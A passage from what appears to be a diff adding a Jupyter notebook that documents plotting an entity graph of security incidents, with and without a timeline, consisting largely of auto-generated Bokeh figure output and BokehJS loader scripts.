table-cell;\">renderers&nbsp;=&nbsp;[GraphRenderer(id='1978', ...)],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">reset_policy&nbsp;=&nbsp;'standard',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">right&nbsp;=&nbsp;[],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">syncable&nbsp;=&nbsp;True,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title&nbsp;=&nbsp;Title(id='1944', ...),</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">title_location&nbsp;=&nbsp;'above',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar&nbsp;=&nbsp;Toolbar(id='1969', ...),</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_location&nbsp;=&nbsp;'right',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">toolbar_sticky&nbsp;=&nbsp;True,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;800,</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_range&nbsp;=&nbsp;Range1d(id='1946', ...),</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">x_scale&nbsp;=&nbsp;LinearScale(id='1950', ...),</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_range&nbsp;=&nbsp;Range1d(id='1948', ...),</div></div><div class=\"2235\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">y_scale&nbsp;=&nbsp;LinearScale(id='1952', ...))</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2236\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2235\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ],
+      "text/plain": [
+       "Figure(id='1943', ...)"
+      ]
+     },
+     "execution_count": 7,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "df = pd.read_pickle(\"data/sent_incidents.pkl\")\n",
+    "df_graph = EntityGraph(df)\n",
+    "df_graph.plot()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Plotting a graph\n",
+    "\n",
+    "As we have seen above a visual representation of the graph can be produced by calling `.plot`. However you can also choose to return but not display the plot by passing the `hide=True` parameter when calling `.plot`:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2238\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2238\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2238\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "graph_out = df_graph.plot(hide=True)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Plotting a graph with a timeline\n",
+    "\n",
+    "Its often useful to see not just the connection between enities in a graph but also how they relate to each other temporarily, for example to see if two entities of suspicion overlap in the times observed, or whether two similar incidents have an overlap in terms of times assocaited. This can be done by calling `.plot_with_timeline`. \n",
+    "\n",
+    "<div class=\"alert alert-block alert-info\">\n",
+    "<b>Note:</b> In some cases entities may not have time parameters to plot, in this case the graph will be displayed on its own.\n",
+    "</div>"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2299\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2299\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\": \"dM3QQsP+wXdHg42wTqW85BjZQdLNNIXqlPw/BgKoExPmTG7ZLML4EGqLMfqHT6ON\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\": \"8x57I4YuIfu8XyZfFo0XVr2WAT8EK4rh/uDe3wF7YuW2FNUSNEpJbsPaB1nJ2fz2\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\": \"3QTqdz9LyAm2i0sG5XTePsHec3UHWwVsrOL68SYRoAXsafvfAyqtQ+h440+qIBhS\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.3.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.3.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2299\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"2360\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     